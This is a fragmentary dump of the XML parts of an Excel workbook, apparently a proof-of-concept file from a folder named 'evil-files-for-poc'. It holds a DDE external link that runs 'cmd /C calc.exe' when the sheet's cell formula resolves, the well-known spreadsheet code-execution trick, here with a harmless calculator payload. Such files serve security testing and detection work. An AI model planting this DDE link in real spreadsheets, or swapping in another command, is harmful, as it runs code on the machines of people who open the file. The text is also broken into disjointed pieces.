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Omri Baso\Desktop\Work-Tools\crypter_test\evil-files-for-poc\excel\"/>
    </mc:Choice>
  </mc:AlternateContent>
  <xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{A811BDDD-12D3-451A-BAA9-B8D5E70F1C85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externalReferences>
    <externalReference r:id="rId2"/>
  </externalReferenc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1" i="1" l="1"/>
</calcChain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tyles" Target="styles.xm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cmd" ddeTopic="/C calc.exe">
    <ddeItems>
      <ddeItem name="A0" advise="1"/>
      <ddeItem name="StdDocumentName" ole="1" advise="1"/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G8" sqref="G8"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="14.4" x14ac:dyDescent="0.3"/>
  <sheetData>
    <row r="1" spans="1:1" x14ac:dyDescent="0.3">
      <c r="A1" t="e">
        <f>[1]!A0</f>
        <v>#REF!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Omri Baso</dc:creator>
  <cp:lastModifiedBy>Omri Baso</cp:lastModifiedBy>
  <dcterms:created xsi:type="dcterms:W3CDTF">2015-06-05T18:17:20Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-01-20T13:15:57Z</dcterms:modified>
</cp:coreProperties>
</file>